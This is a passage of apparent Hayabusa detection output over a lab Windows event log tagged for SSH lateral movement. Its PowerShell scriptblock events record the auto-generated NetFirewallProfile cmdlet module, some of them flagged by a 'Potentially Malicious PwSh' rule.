config.evtx +2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.664 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module 
$script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 